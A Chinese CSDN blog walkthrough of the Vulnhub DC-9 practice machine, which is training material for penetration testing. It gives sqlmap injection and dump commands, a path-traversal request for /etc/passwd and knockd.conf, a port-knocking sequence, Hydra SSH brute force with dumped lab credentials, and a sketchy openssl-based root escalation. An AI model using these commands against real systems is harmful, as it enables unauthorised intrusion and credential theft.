【Vulnhub】DC-9

最新推荐文章于 2024-08-24 15:46:50 发布
最新推荐文章于 2024-08-24 15:46:50 发布
阅读量100 收藏
点赞数
分类专栏: Vulnhub 文章标签: 网络安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhangshuaiijie/article/details/131259411
版权
文章描述了一次针对有限开放端口(22和80)的网站渗透过程,通过SQL注入发现数据库信息,利用knockd服务进行端口敲门解锁SSH,然后使用Hydra进行密码爆破,最终实现权限提升并找到隐藏目录和密码文件。
摘要由CSDN通过智能技术生成

信息收集

只开了两个端口,22和80,访问网站,不是框架

在这里插入图片描述
逛了一下,功能就是显示员工信息,有模糊查询,有登录
看来看去也就查询页有可能有漏洞,登录页连用户名都不知道不可能直接爆破,那花的时间太长了,查询页最可能就是sql注入漏洞
post提交方式,search变量
在这里插入图片描述

网站渗透

sqlmap -u 'http://192.168.83.141/results.php' --data 'search=1' --dbs --batch
判断是否有post方式的注入
--data post方式提交

search就是注入点

在这里插入图片描述
然后一把嗦

sqlmap -u 'http://192.168.83.141/results.php' --data 'search=1' -D Staff --tables --batch
sqlmap -u 'http://192.168.83.141/results.php' --data 'search=1' -D Staff -T Users --dump --batch
856f5de590ef37314e7c3bdf6f8a66dc | admin

看着像MD5,解密一下
很多网站这个是付费的,这个免费https://www.somd5.com/
transorbital1
在这里插入图片描述
登录一下,多了这一页
在这里插入图片描述
这个页面是添加员工信息的,看能不能写一段php代码进去解析掉
试过了,并不能写进去只会被注释掉,不知道什么原理
在这里插入图片描述
看第二个点

File does not exist

文件包含,尝试一下

http://192.168.83.141/manage.php/?file=../../../../../../../etc/passwd

在这里插入图片描述
后面我也不会了

ssh

因为nmap扫描到有22端口,但是流量都被过滤了,怀疑有knockd服务
knockd服务,即端口敲门服务,该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来“敲门”,使系统开启需要访问的服务端口,才能对外访问。不使用时,再使用自定义的序列号来“关门”,将端口关闭,不对外监听。进一步提升了服务和系统的安全性。一般配置文件在/etc/knockd.conf中,所以尝试读取一下文件,确实存在该配置

在这里插入图片描述

 使用kali系统下的knockd工具:
安装:
sudo apt install -y knockd
敲门:
knock 192.168.83.141 7469 8475 9842
验证
nmap -p 22 192.168.83.141

然后靶机的ssh就open了
在这里插入图片描述
sql注入:数据库user下有一个UserDetails表里面有用户名和密码,得到用户名密码字典用hydra爆破

hydra -L username.txt -P password.txt ssh://192.168.83.141

±—±-----------±--------------±--------------------±----------±----------+
| id | lastname | password | reg_date | username | firstname |
±—±-----------±--------------±--------------------±----------±----------+
| 1 | Moe | 3kfs86sfd | 2019-12-29 16:58:26 | marym | Mary |
| 2 | Dooley | 468sfdfsd2 | 2019-12-29 16:58:26 | julied | Julie |
| 3 | Flintstone | 4sfd87sfd1 | 2019-12-29 16:58:26 | fredf | Fred |
| 4 | Rubble | RocksOff | 2019-12-29 16:58:26 | barneyr | Barney |
| 5 | Cat | TC&TheBoyz | 2019-12-29 16:58:26 | tomc | Tom |
| 6 | Mouse | B8m#48sd | 2019-12-29 16:58:26 | jerrym | Jerry |
| 7 | Flintstone | Pebbles | 2019-12-29 16:58:26 | wilmaf | Wilma |
| 8 | Rubble | BamBam01 | 2019-12-29 16:58:26 | bettyr | Betty |
| 9 | Bing | UrAG0D! | 2019-12-29 16:58:26 | chandlerb | Chandler |
| 10 | Tribbiani | Passw0rd | 2019-12-29 16:58:26 | joeyt | Joey |
| 11 | Green | yN72#dsd | 2019-12-29 16:58:26 | rachelg | Rachel |
| 12 | Geller | ILoveRachel | 2019-12-29 16:58:26 | rossg | Ross |
| 13 | Geller | 3248dsds7s | 2019-12-29 16:58:26 | monicag | Monica |
| 14 | Buffay | smellycats | 2019-12-29 16:58:26 | phoebeb | Phoebe |
| 15 | McScoots | YR3BVxxxw87 | 2019-12-29 16:58:26 | scoots | Scooter |
| 16 | Trump | Ilovepeepee | 2019-12-29 16:58:26 | janitor | Donald |
| 17 | Morrison | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2 | Scott |
±—±-----------±--------------±--------------------±----------±----------+

在这里插入图片描述

[22][ssh] host: 192.168.232.136 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.232.136 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.232.136 login: janitor password: Ilovepeepee

用ssh登录

ssh username@192.168.83.141

有一个隐藏目录,里面放了一个密码文件,在去hydra爆破一下

[22][ssh] host: 192.168.232.136 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.232.136 login: fredf password: B4-Tru3-001

在这里插入图片描述
再次登录,fredf 账户能以root权限操作
在这里插入图片描述
打开是部分乱码,看不懂,上两级有一个test.py
大概就是将参数1的内容写入参数2中,接下来尝试进行提权。
用openssl工具创建一个本地的加密用户

openssl passwd -1 -salt admin admin
-1 #使用md5加密算法
-salt #自动锚入一个随机参数作为文件内容加密

然后切换admin账户,是root权限,读取flag

总结

这个靶机难很多,前面网站渗透还能行,主要是跨度太大很难想到正确解决方法

逢星
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
VulnHub DC-1
weixin_45682839的博客
04-13 342
VnlnHub DC-1靶场攻关攻略记录,五个flag,获得root权限。
Vulnhub DC-9
Pai_Space
04-11 3123
明确:《中华人民共和国网络安全法》 Description DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. The ultimate goal of this challenge is to get root and to read the one and only flag. Linux skill..
Vulnhub靶场----9、DC-9
七天
03-03 772
Vulnhub-DC9
Vulnhub - DC-1
qq_46081990的博客
03-14 388
Nmap扫描目标主机,发现开放22、80、111、40884端口,分别运行OpenSSH 6.0p1、Apache httpd 2.2.22、rpcbind 2-4服务。MSF搜索Drupal,使用payload:exploit/unix/webapp/drupal_drupalgeddon2,成功拿到Web权限www-data。查询GTFOBins得知find的SUID提权方式如下,启用一个新的root权限的bash。上传综合辅助探测脚本LinEnum.sh至目标主机/tmp目录下,给予执行权限执行。
Vulnhub DC-5
Pai_Space
02-20 287
Description DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. The plan was for DC-5 to kick it up a notch, so this might not be great for beginners, but should be ok for people with.
vulnhub DC-4靶机实战
m0_51195235的博客
10-04 2279
vulnhub DC-4靶机实战
Vulnhub DC-8
Pai_Space
04-05 1017
明确:《中华人民共和国网络安全法》 Description DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This challenge is a bit of a hybrid between being an actual challenge, and being a "proof of conce..
vulnhub靶机-DC系列-DC-1
qq_45953122的博客
08-08 281
DC-1详解
Vulnhub DC-6
Pai_Space
03-11 776
Description DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This isn't an overly difficult challenge so should be great for beginners. The ultimate goal of this challenge is to g.
Vulnhub DC-7
Pai_Space
03-26 5335
明确:《中华人民共和国网络安全法》 Description DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. While this isn't an overly technical challenge, it isn't exactly easy. While it's kind of a logic..
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8414
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
虚拟内存和linux(操作系统part1)
最新发布
linjixia的博客
08-24 476
八股之虚拟内存和Linux部分的笔记。
Linux 线程的控制 互斥与同步
qq_63145217的博客
08-23 901
include //头文件sem_t sem;信号量的类型 信号量的变量。
多进程和多线程基础概念LINUX
2301_79109608的博客
08-22 1036
直接访问物理地址,会导致地址空间没有隔离,很容易导致数据被修改通过虚拟地址空间可以实现每个进程空间都是独立的,操作系统会映射到不用的物理地址区间,在访问时互不干扰.进程状态分为三个基本状态,即运行态,就绪态,阻塞态。在五态模型中,进程分为新建态、终止态,运行态,就绪态,阻塞态。并发:有限的 cpu 核芯的情况下 ,利用快速交替(时间片轮转)执行来达到宏观上的同时执行。虚拟地址 : 虚拟地址并不代表真实的内存空间,而是一个用于寻址的编号。并行:在 cpu 多核的支持下,实现物理上的同时执行。
DC-DC电源模块工作原理详解
"DC-DC电源模块是一种将直流电转换为另一固定或可调直流电的设备,广泛应用在各种电子设备中。它的工作原理主要涉及高频开关、滤波、控制和储能等环节,以实现高效、小型化和稳定的电源供应。" DC-DC电源模块的核心...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值